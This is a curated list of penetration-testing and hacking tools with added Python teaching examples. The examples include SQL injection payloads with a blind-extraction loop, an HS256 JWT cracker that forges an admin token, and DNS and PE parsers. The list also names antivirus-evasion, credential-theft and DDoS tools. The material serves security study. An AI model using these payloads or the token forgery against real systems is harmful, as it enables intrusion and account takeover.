Penetration testing tools are used by security teams to find vulnerabilities in networks and applications before an attacker does. Below is a categorised list of penetration testing and hacking tools covering the environments a tester is likely to meet.

List of penetration testing and hacking tools

Online Resources

Penetration Testing Resources

Exploit Development

OSINT Resources

Social Engineering Resources

Lock Picking Resources

Operating Systems

Hacking Tools

Penetration Testing Distributions

  • Kali – GNU/Linux distribution designed for digital forensics and penetration testing.
  • ArchStrike – Arch GNU/Linux repository for security professionals and enthusiasts.
  • BlackArch – Arch GNU/Linux-based distribution with a large collection of hacking tools for penetration testers and security researchers.
  • Network Security Toolkit (NST) – Fedora-based bootable live operating system designed to provide easy access to best-of-breed open source network security applications.
  • Pentoo – Security-focused live CD based on Gentoo.
  • BackBox – Ubuntu-based distribution for penetration tests and security assessments.
  • Parrot – Distribution similar to Kali, available for several architectures, with a large collection of hacking tools.
  • Buscador – GNU/Linux virtual machine pre-configured for online investigators.
  • Fedora Security Lab – Provides a safe test environment for working on security auditing, forensics, system rescue and teaching security testing methodologies.
  • The Pentesters Framework – Distribution organised around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that leaves out often-unused toolchains.
  • AttifyOS – GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.

Docker Images for Penetration Testing

Multi-paradigm Frameworks

  • Metasploit – Exploitation framework for offensive security teams to help verify vulnerabilities and manage security assessments.
  • Armitage – Java-based GUI front-end for the Metasploit Framework.
  • Faraday – Multi-user integrated pentesting environment for red teams performing cooperative penetration tests, security audits and risk assessments.
  • ExploitPack – Graphical tool for automating penetration tests that ships with a large number of ready-made exploits.
  • Pupy – Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool.

Vulnerability Scanners

  • Nexpose – Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
  • Nessus – Commercial vulnerability management, configuration and compliance assessment platform, sold by Tenable.
  • OpenVAS – Free software vulnerability scanner that was forked from the last open source release of Nessus.
  • Vuls – Agentless vulnerability scanner for GNU/Linux and FreeBSD, written in Go.

Static Analyzers

  • Brakeman – Static analysis security vulnerability scanner for Ruby on Rails applications.
  • cppcheck – Extensible C/C++ static analyzer focused on finding bugs.
  • FindBugs – Free software static analyzer for finding bugs in Java code.
  • sobelow – Security-focused static analysis for the Phoenix (Elixir) framework.
  • bandit – Security-oriented static analyzer for Python code.

Web Scanners

  • Nikto – Noisy but fast black-box web server and web application vulnerability scanner.
  • Arachni – Scriptable framework for evaluating the security of web applications.
  • w3af – Web application attack and audit framework.
  • Wapiti – Black-box web application vulnerability scanner with a built-in fuzzer.
  • SecApps – In-browser web application security testing suite.
  • WebReaver – Commercial, graphical web application vulnerability scanner for macOS.
  • WPScan – Black-box WordPress vulnerability scanner.
  • CMS-explorer – Reveals the specific modules, plugins, components and themes that sites running various content management systems use.
  • joomscan – Joomla vulnerability scanner.
  • ACSTIS – Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.

Network Tools

  • zmap – Open source network scanner that lets researchers easily perform Internet-wide network studies.
  • Nmap – Free security scanner for network exploration and security auditing.
  • pig – GNU/Linux packet crafting tool.
  • scanless – Utility for using websites to perform port scans on your behalf so as not to reveal your own IP.
  • tcpdump/libpcap – Common command-line packet analyzer.
  • Wireshark – Widely used graphical, cross-platform network protocol analyzer.
  • Network-Tools.com – Website offering an interface to numerous basic network utilities such as ping, traceroute, whois and more.
  • netsniff-ng – Swiss army knife for network sniffing.
  • Intercepter-NG – Multifunctional network toolkit.
  • SPARTA – Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
  • dnschef – Highly configurable DNS proxy for pentesters.
  • DNSDumpster – Online DNS recon and search service.
  • CloudFail – Unmasks server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
  • dnsenum – Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary-style attack and then performs reverse lookups on the results.
  • dnsmap – Passive DNS network mapper.
  • dnsrecon – DNS enumeration script.
  • dnstracer – Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
  • passivedns-client – Library and query tool for querying several passive DNS providers.
  • passivedns – Network sniffer that logs all DNS server replies for use in a passive DNS setup.
  • Mass Scan – TCP port scanner that spews SYN packets asynchronously; according to its README it can scan the entire Internet in under five minutes from a single machine with enough bandwidth.
  • Zarp – Network attack tool centred on exploiting local networks.
  • mitmproxy – Interactive, TLS-capable intercepting HTTP proxy for penetration testers and software developers.
  • Morpheus – Automated ettercap TCP/IP hijacking tool.
  • mallory – HTTP/HTTPS proxy over SSH.
  • SSH MITM – Intercepts SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
  • Netzob – Reverse engineering, traffic generation and fuzzing of communication protocols.
  • DET – Proof of concept for performing data exfiltration using one or several channels at the same time.
  • pwnat – Punches holes in firewalls and NATs.
  • dsniff – Collection of tools for network auditing and pentesting.
  • tgcd – Simple Unix network utility to extend the accessibility of TCP/IP-based network services beyond firewalls.
  • smbmap – Handy SMB enumeration tool.
  • scapy – Python-based interactive packet manipulation program and library.
  • Dshell – Network forensic analysis framework.
  • Debookee – Simple and powerful network traffic analyzer for macOS.
  • Dripcap – Caffeinated packet analyzer.
  • Printer Exploitation Toolkit (PRET) – Tool for printer security testing capable of IP and USB connectivity, fuzzing and exploitation of PostScript, PJL and PCL printer language features.
  • Praeda – Automated multi-function printer data harvester for gathering usable data during security assessments.
  • routersploit – Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
  • evilgrade – Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
  • XRay – Network (sub)domain discovery and reconnaissance automation tool.
  • Ettercap – Comprehensive, mature suite for machine-in-the-middle attacks.
  • BetterCAP – Modular, portable and easily extensible MITM framework.
  • CrackMapExec – Swiss army knife for pentesting networks.
  • impacket – Collection of Python classes for working with network protocols.
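
The DNS tools above (dnsenum, dnsrecon, passivedns and friends) all build and pick apart the same RFC 1035 wire format. The following is an added example written for this page, not code from any of those projects: it builds a standard query, parses a response including name-compression pointers, and assembles a hand-made reply so the whole thing runs offline. The name www.example.test, the address 192.0.2.10 and the transaction ID are constructed placeholders.

```python
import struct

# Constructed sample data for this example (not captured traffic): the name
# www.example.test and the address 192.0.2.10 (TEST-NET-1) are placeholders.
RR_TYPES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX", 16: "TXT", 28: "AAAA", 252: "AXFR"}


def encode_name(name: str) -> bytes:
    """Dotted name -> length-prefixed labels terminated by a zero-length label."""
    labels = [l.encode("ascii") for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"


def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Standard query: 12-byte header with RD=1 and QDCOUNT=1, then one question (class IN)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def decode_name(msg: bytes, off: int):
    """Decode a (possibly compressed) name at off.

    Returns (name, offset just past the name in the original byte stream); a
    pointer (top two bits set) ends the name in the stream even though decoding
    continues at the pointed-to offset.
    """
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:
            if end is None:
                end = off + 2
            off = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            hops += 1
            if hops > 64:                      # guard against pointer loops in hostile replies
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_response(msg: bytes) -> dict:
    """Parse the header, question section and every resource record of a DNS response."""
    txid, flags, qd, an, ns, ar = struct.unpack_from("!HHHHHH", msg, 0)
    if not flags & 0x8000:
        raise ValueError("QR bit clear: this is a query, not a response")
    off, questions, records = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, _qclass = struct.unpack_from("!HH", msg, off)
        off += 4
        questions.append((name, RR_TYPES.get(qtype, qtype)))
    for _ in range(an + ns + ar):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10
        if rtype == 1 and rdlen == 4:
            data = ".".join(str(b) for b in msg[off:off + 4])
        elif rtype in (2, 5):                  # NS / CNAME rdata is itself a (compressible) name
            data, _ = decode_name(msg, off)
        else:
            data = msg[off:off + rdlen].hex()
        off += rdlen
        records.append({"name": name, "type": RR_TYPES.get(rtype, rtype), "ttl": ttl, "data": data})
    return {"id": txid, "rcode": flags & 0xF, "truncated": bool(flags & 0x0200),
            "questions": questions, "records": records}


def sample_response() -> bytes:
    """Hand-assembled reply to build_query("www.example.test"): a CNAME, then an A record."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 2, 0, 0)        # QR, RD, RA, NOERROR, 2 answers
    question = encode_name("www.example.test") + struct.pack("!HH", 1, 1)
    # Offsets: the question name starts at 12, and "example.test" inside it at 16.
    cname_rdata = encode_name("host")[:-1] + b"\xc0\x10"               # "host" + pointer -> example.test
    rr1 = b"\xc0\x0c" + struct.pack("!HHIH", 5, 1, 300, len(cname_rdata)) + cname_rdata
    rr2 = b"\xc0\x2e" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes([192, 0, 2, 10])  # name -> rr1 rdata at offset 46
    return header + question + rr1 + rr2


if __name__ == "__main__":
    for rr in parse_response(sample_response())["records"]:
        print(f'{rr["name"]:20} {rr["ttl"]:>5} {rr["type"]:6} {rr["data"]}')
```

To use it against a live resolver, send the bytes from build_query over UDP port 53 with a plain socket and feed the reply to parse_response; a zone-transfer attempt of the kind dnsenum makes (qtype 252, AXFR) must go over TCP with a two-byte length prefix. LLMNR (UDP 5355) uses the same message format, so the parser also lets you log the names hosts ask for on the local segment, which is what a poisoner such as Responder answers.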

Wireless Hacking Tools

  • Aircrack-ng – Set of tools for auditing wireless networks.
  • Kismet – Wireless network detector, sniffer and IDS.
  • Reaver – Brute force attack against WiFi Protected Setup (WPS).
  • Wifite – Automated wireless attack tool.
  • Fluxion – Suite of automated, social-engineering-based WPA attacks.

Transport Layer Security Tools

  • SSLyze – Fast and comprehensive TLS/SSL configuration analyzer that helps identify security misconfigurations.
  • tls_prober – Fingerprints a server's SSL/TLS implementation.
  • testssl.sh – Command-line tool that checks a server's service on any port for support of TLS/SSL ciphers and protocols as well as some cryptographic flaws.

Web Exploitation

  • OWASP Zed Attack Proxy (ZAP) – Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
  • Fiddler – Free cross-platform web debugging proxy with user-friendly companion tools.
  • Burp Suite – Integrated platform for performing security testing of web applications.
  • autochrome – Easy-to-install test browser with all the appropriate settings needed for web application testing, with native Burp support, from NCC Group.
  • Browser Exploitation Framework (BeEF) – Command and control server for delivering exploits to commandeered web browsers.
  • Offensive Web Testing Framework (OWTF) – Python-based framework for pentesting web applications based on the OWASP Testing Guide.
  • WordPress Exploit Framework – Ruby framework for developing and using modules that aid in penetration testing of WordPress-powered websites and systems.
  • WPSploit – Exploits WordPress-powered websites with Metasploit.
  • SQLmap – Automatic SQL injection and database takeover tool.
  • tplmap – Automatic server-side template injection and web server takeover tool.
  • weevely3 – Weaponized web shell.
  • Wappalyzer – Reveals the technologies used on websites.
  • WhatWeb – Website fingerprinter.
  • BlindElephant – Web application fingerprinter.
  • wafw00f – Identifies and fingerprints Web Application Firewall (WAF) products.
  • fimap – Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
  • Kadabra – Automatic LFI exploiter and scanner.
  • Kadimus – LFI scan and exploit tool.
  • liffy – LFI exploitation tool.
  • Commix – Automated all-in-one operating system command injection and exploitation tool.
  • DVCS Ripper – Rips web-accessible (distributed) version control systems: SVN/Git/Hg/Bzr.
  • GitTools – Automatically finds and downloads web-accessible .git repositories.
  • sslstrip – Demonstration of the HTTPS stripping attack.
  • sslstrip2 – Version of sslstrip that defeats HSTS by rewriting hostnames; domains on the browser preload list with includeSubDomains are not affected.
  • NoSQLmap – Automatic NoSQL injection and database takeover tool.
  • VHostScan – Virtual host scanner that performs reverse lookups, can be used with pivot tools, and detects catch-all scenarios, aliases and dynamic default pages.
  • FuzzDB – Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
  • EyeWitness – Takes screenshots of websites, provides some server header information and identifies default credentials where possible.
  • webscreenshot – Simple script to take screenshots of a list of websites.
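
What SQLmap automates is worth seeing at the smallest scale. The following is an added example for this page, not SQLmap's code: a login query that splices user input into SQL next to its parameterized fix, plus a boolean-based blind extraction loop that recovers a value one character at a time through nothing but the "row returned or not" signal. It runs against an in-memory SQLite database with two constructed rows; the users, passwords and roles are made up for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with two constructed rows (sample data for the example)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                    [("alice", "correct-horse", "user"), ("bob", "hunter2", "admin")])
    return con


def login_vulnerable(con, username: str, password: str) -> list:
    """User input is spliced into the SQL text, so quotes in it become SQL syntax."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchall()


def login_parameterized(con, username: str, password: str) -> list:
    """Bound parameters travel separately from the statement: the same input is only data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()


def blind_extract(con, subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction through the vulnerable login.

    Each probe reveals only whether a row came back, so the value is recovered
    one character at a time. `subquery` is an SQL expression yielding a single
    string (e.g. a SELECT of one column from one row).
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):            # printable ASCII
            probe = f"alice' AND unicode(substr(({subquery}), {pos}, 1)) = {code} --"
            if login_vulnerable(con, probe, ""):
                recovered += chr(code)
                break
        else:
            break                              # no character matched: past the end of the string
    return recovered


def demo() -> dict:
    con = make_db()
    tautology = "' OR '1'='1"
    return {
        "vulnerable": login_vulnerable(con, "alice", tautology),          # every user comes back
        "parameterized": login_parameterized(con, "alice", tautology),    # no rows
        "union": login_vulnerable(con, "x' UNION SELECT username, password FROM users --", ""),
        "blind": blind_extract(con, "SELECT password FROM users WHERE username = 'bob'"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:14} {result}")
```

The tautology and UNION payloads need the result to be displayed; the blind loop does not, which is why sqlmap's inference techniques still work against pages that show only "login failed". The fix is the parameterized version, not input filtering: the same payloads return nothing from login_parameterized.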

Hex Editor

  • HexEdit.js – Browser-based hex editing.
  • Hexinator – Proprietary, commercial hex editor (self-described as the world's finest).
  • Frhed – Binary file editor for Windows.
  • 0xED – Native macOS hex editor that supports plug-ins to display custom data types.

File Format Analysis Tools

  • Kaitai Struct – File format and network protocol parsing language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python and Ruby.
  • Veles – Binary data visualization and analysis tool.
  • Hachoir – Python library to view and edit a binary stream as a tree of fields, plus tools for metadata extraction.
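
The format-analysis tools above turn a byte stream into a tree of typed fields. As an added example (written for this page, not code from Kaitai Struct or Hachoir), here is the same idea done by hand for the header chain of a Windows PE file: DOS header, PE signature, COFF header, optional header and section table, reporting the fields a security reviewer looks at first (exploit-mitigation flags and any writable-and-executable section). The input is a constructed header skeleton assembled in sample_pe, not a real executable; the section names and addresses in it are made up.

```python
import struct

MACHINE = {0x14C: "i386", 0x1C0: "ARM", 0x8664: "x86-64", 0xAA64: "ARM64"}
OPT_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
# IMAGE_DLLCHARACTERISTICS_* bits relevant to exploit mitigations
DLLCHAR = {"high_entropy_va": 0x0020, "aslr": 0x0040, "nx": 0x0100, "no_seh": 0x0400, "cfg": 0x4000}
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, timestamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    fmt = OPT_MAGIC.get(magic)
    if fmt is None:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    # ImageBase is a DWORD at +28 in PE32 (after BaseOfData) but a QWORD at +24 in PE32+.
    if fmt == "PE32":
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]       # same offset in both formats
    sections = []
    for i in range(nsect):
        fields = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        name, vsize, vaddr, rawsize, rawptr, scn = fields[0], fields[1], fields[2], fields[3], fields[4], fields[9]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr, "vsize": vsize, "raw_offset": rawptr, "raw_size": rawsize,
            "rwx": (scn & (SCN_WRITE | SCN_EXECUTE)) == (SCN_WRITE | SCN_EXECUTE),
        })
    return {
        "machine": MACHINE.get(machine, f"{machine:#x}"), "format": fmt, "timestamp": timestamp,
        "is_dll": bool(chars & 0x2000), "entry_point": entry, "image_base": image_base,
        "mitigations": {k: bool(dll_chars & v) for k, v in DLLCHAR.items()},
        "sections": sections,
        "rwx_sections": [s["name"] for s in sections if s["rwx"]],
    }


def sample_pe() -> bytes:
    """Constructed PE32+ header skeleton (not a real executable): DOS header, signature,
    COFF header, a 240-byte optional header and two section headers, with no section data."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0x5F000000, 0, 0, 240, 0x0022)   # x86-64, 2 sections, EXECUTABLE_IMAGE|LARGE_ADDRESS_AWARE
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+
    struct.pack_into("<I", opt, 16, 0x1000)          # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x140000000)     # ImageBase
    struct.pack_into("<H", opt, 70, 0x0160)          # HIGH_ENTROPY_VA | DYNAMIC_BASE | NX_COMPAT, no CFG
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)    # CODE|EXECUTE|READ
    packed = struct.pack("<8sIIIIIIHHI", b".packed", 0x100, 0x2000, 0x200, 0x600, 0, 0, 0, 0, 0xE0000020) # EXECUTE|READ|WRITE
    return dos + b"PE\0\0" + coff + bytes(opt) + text + packed


if __name__ == "__main__":
    info = parse_pe(sample_pe())
    print(info["machine"], info["format"], hex(info["entry_point"]), hex(info["image_base"]))
    print("mitigations:", info["mitigations"])
    print("RWX sections:", info["rwx_sections"])
```

Pass the bytes of a real file to parse_pe to get the same report; an RWX section or a missing DYNAMIC_BASE/NX_COMPAT flag is exactly what a packer or an old build leaves behind, and is a quick triage signal before opening the file in a disassembler.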

Defense Evasion Tools

  • Veil – Generates Metasploit payloads that bypass common antivirus solutions.
  • shellsploit – Generates custom shellcode, backdoors and injectors, optionally obfuscating every byte via encoders.
  • Hyperion – Runtime encryptor for 32-bit portable executables ("PE .exes").
  • AntiVirus Evasion Tool (AVET) – Post-processes exploits containing executable files targeted at Windows machines to avoid recognition by antivirus software.
  • peCloak.py – Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
  • peCloakCapstone – Multi-platform fork of the peCloak.py automated antivirus evasion tool.
  • UniByAv – Simple obfuscator that takes raw shellcode and generates antivirus-friendly executables using a brute-forceable 32-bit XOR key.

Hash Cracking Tools

  • John the Ripper – Fast password cracker.
  • Hashcat – Fast hash cracker with GPU acceleration.
  • CeWL – Generates custom wordlists by spidering a target's website and collecting unique words.
  • JWT Cracker – Simple HS256 JWT token brute-force cracker.
  • Rar Crack – RAR brute-force cracker.
  • Bruteforce Wallet – Finds the password of an encrypted wallet file (i.e. wallet.dat).
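
An HS256 JWT is signed with HMAC-SHA256 over its first two segments, so "cracking" it is an offline dictionary attack: re-sign with each candidate secret and compare. The following is an added example for this page, not the JWT Cracker project's code. It mints a token from a deliberately weak secret so that everything runs offline; the secret, claims and wordlist are constructed for the example, and the forge step shows why a recovered secret is worse than a recovered password (any claim can be rewritten).

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Mint a JWT: b64url(header).b64url(payload).b64url(HMAC-SHA256(secret, first two parts))."""
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode()) + "." +
                     b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def payload_of(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, wordlist):
    """Offline dictionary attack: re-sign the token's first two segments with each
    candidate secret and compare against the supplied signature. Returns the secret or None."""
    head_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(head_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"token alg is {header.get('alg')!r}, not HS256")
    signing_input = f"{head_b64}.{body_b64}".encode("ascii")
    target = b64url_decode(sig_b64)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode("utf-8"), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def forge_with(token: str, secret: str, **claims) -> str:
    """Once the secret is known, any claim can be rewritten and the token re-signed."""
    head_b64, body_b64, _ = token.split(".")
    header = json.loads(b64url_decode(head_b64))
    payload = {**json.loads(b64url_decode(body_b64)), **claims}
    return sign_hs256(header, payload, secret.encode("utf-8"))


# Constructed demo material: a deliberately weak secret and a tiny wordlist.
WEAK_SECRET = "secret123"
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, WEAK_SECRET.encode())
WORDLIST = ["password", "123456", "letmein", "secret", "secret123", "hunter2"]

if __name__ == "__main__":
    found = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", found)
    if found:
        print("forged admin token:", forge_with(SAMPLE_TOKEN, found, role="admin"))
```

A wordlist produced by CeWL from the target's own site is the natural input here. Hashcat does the same computation far faster (HMAC-SHA256 is cheap per guess, which is the point: the only defence is a long random secret, or an asymmetric algorithm such as RS256 with the server refusing any other `alg` value).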

Utilities for Windows

  • Sysinternals Suite – The Sysinternals troubleshooting utilities.
  • Windows Credential Editor – Inspects logon sessions and adds, changes, lists and deletes associated credentials, including Kerberos tickets.
  • mimikatz – Credential extraction tool for the Windows operating system.
  • PowerSploit – PowerShell post-exploitation framework.
  • Windows Exploit Suggester – Detects potentially missing patches on the target.
  • Responder – LLMNR, NBT-NS and mDNS poisoner.
  • BloodHound – Graphical Active Directory trust relationship explorer.
  • Empire – Pure PowerShell post-exploitation agent.
  • Fibratus – Tool for exploration and tracing of the Windows kernel.
  • wePWNise – Generates architecture-independent VBA code for use in Office documents or templates, and automates bypassing application control and exploit mitigation software.
  • redsnarf – Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers and domain controllers.
  • Magic Unicorn – Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML Applications (HTA) and certutil (using fake certificates).
  • DeathStar – Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.

Utilities for GNU / Linux

Utilities for macOS

  • Bella – Pure Python post-exploitation data mining and remote administration tool for macOS.

DDoS Tools

  • LOIC – Open source network stress tool for Windows.
  • JS LOIC – JavaScript, in-browser version of LOIC.
  • SlowLoris – DoS tool that uses little bandwidth on the attacking side by holding many partially-open HTTP connections.
  • HOIC – Updated version of Low Orbit Ion Cannon with "boosters" to get around common countermeasures.
  • T50 – Faster network stress tool.
  • UFONet – Abuses OSI layer 7 HTTP to create/manage "zombies" and conduct different attacks using GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.

Social Engineering Tools

  • Social Engineer Toolkit (SET) – Open source pentesting framework designed for social engineering, featuring a number of custom attack vectors to make believable attacks quickly.
  • King Phisher – Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.
  • Evilginx – MITM attack framework used for phishing credentials and session cookies from any web service.
  • wifiphisher – Automated phishing attacks against WiFi networks.
  • Catphish – Phishing and corporate espionage tool written in Ruby.
  • Beelogger – Tool for generating keyloggers.

OSINT Tools

  • Maltego – Proprietary software for open source intelligence and forensics, from Paterva.
  • theHarvester – Email, subdomain and people-name harvester.
  • creepy – Geolocation OSINT tool.
  • metagoofil – Metadata harvester.
  • Google Hacking Database – Database of Google dorks that can be used for reconnaissance.
  • Google dorks – Common Google dorks and others you probably don't know.
  • GooDork – Command-line Google dorking tool.
  • dork-cli – Command-line Google dork tool.
  • Censys – Collects data on hosts and websites through daily ZMap and ZGrab scans.
  • Shodan – World's first search engine for Internet-connected devices.
  • recon-ng – Full-featured web reconnaissance framework written in Python.
  • github-dorks – CLI tool to scan GitHub repositories and organisations for potential sensitive information leaks.
  • vcsmap – Plug-in based tool to scan public version control systems for sensitive information.
  • Spiderfoot – Multi-source OSINT automation tool with a web UI and report visualisations.
  • BinGoo – GNU/Linux bash-based Bing and Google dorking tool.
  • fast-recon – Performs Google dorks against a domain.
  • snitch – Information gathering via dorks.
  • Sn1per – Automated pentest recon scanner.
  • Threat Crowd – Search engine for threats.
  • VirusTotal – Free service that analyzes suspicious files and URLs and facilitates quick detection of viruses, worms, trojans and other kinds of malware.
  • DataSploit – OSINT visualizer using Shodan, Censys, Clearbit, EmailHunter, FullContact and ZoomEye behind the scenes.
  • AQUATONE – Subdomain discovery tool that uses various open sources and produces a report usable as input to other tools.
  • Intrigue – Automated OSINT and attack surface discovery framework with a powerful API, UI and CLI.
  • ZoomEye – Cyberspace search engine that lets the user find specific network components.

Tools for Anonymity

  • Tor – Free software and onion-routed overlay network that helps defend against traffic analysis.
  • OnionScan – Tool for investigating the dark web by finding operational security issues introduced by Tor hidden service operators.
  • I2P – The Invisible Internet Project.
  • Nipe – Script to redirect all traffic from the machine to the Tor network.
  • What every Browser knows about you – Comprehensive detection page to test your own web browser's configuration for privacy and identity leaks.

Reverse Engineering Tools

  • Interactive Disassembler (IDA Pro) – Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux or macOS; a free version, IDA Free, is also available.
  • WDK/WinDbg – Windows Driver Kit and WinDbg.
  • OllyDbg – x86 debugger for Windows binaries that emphasizes binary code analysis.
  • Radare2 – Open source, cross-platform reverse engineering framework.
  • x64dbg – Open source x64/x32 debugger for Windows.
  • Immunity Debugger – Powerful way to write exploits and analyze malware.
  • Evan's Debugger (EDB) – OllyDbg-like debugger for GNU/Linux.
  • Medusa – Open source, cross-platform interactive disassembler.
  • plasma – Interactive disassembler for x86/ARM/MIPS that generates indented pseudo-code with coloured syntax.
  • peda – Python Exploit Development Assistance for GDB.
  • dnSpy – Tool for reverse engineering .NET assemblies.
  • binwalk – Fast, easy-to-use tool for analyzing, reverse engineering and extracting firmware images.
  • PyREBox – Python-scriptable reverse engineering sandbox from Cisco Talos.
  • Voltron – Extensible debugger UI toolkit written in Python.
  • Capstone – Lightweight multi-platform, multi-architecture disassembly framework.
  • rVMI – Debugger on steroids; inspect userspace processes, kernel drivers and pre-boot environments in a single tool.
  • Frida – Dynamic instrumentation toolkit for developers, reverse engineers and security researchers.

Physical Access Tools

  • LAN Turtle – Covert "USB Ethernet Adapter" that provides remote access, network intelligence gathering and MITM capabilities when installed in a local network.
  • USB Rubber Ducky – Customizable keystroke injection attack platform masquerading as a USB thumb drive.
  • Poisontap – Siphons cookies, exposes the internal (LAN-side) router and installs a web backdoor on locked computers.
  • WiFi Pineapple – Wireless auditing and penetration testing platform.
  • Proxmark3 – RFID/NFC cloning, replay and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/key fobs and more.

Side-channel Tools

  • ChipWhisperer – Complete open source toolchain for side-channel power analysis and glitching attacks.

CTF tools

  • ctf-tools – Collection of setup scripts to install various security research tools, easily and quickly deployable to new machines.
  • Pwntools – Rapid exploit development framework built for use in CTFs.
  • RsaCtfTool – Decrypts data enciphered with weak RSA keys and recovers private keys from public keys using a variety of automated attacks.

Penetration Test Report Templates

  • Public Pentesting Reports – Curated list of public penetration test reports released by several consulting firms and academic security groups.
  • Pentesting report template – testandverification.com template.
  • Pentesting report template – hitachi-systems-security.com template.
  • Pentesting report template – lucideus.com template.
  • Pentesting report template – crest-approved.org template.
  • Pentesting report template – pcisecuritystandards.org template.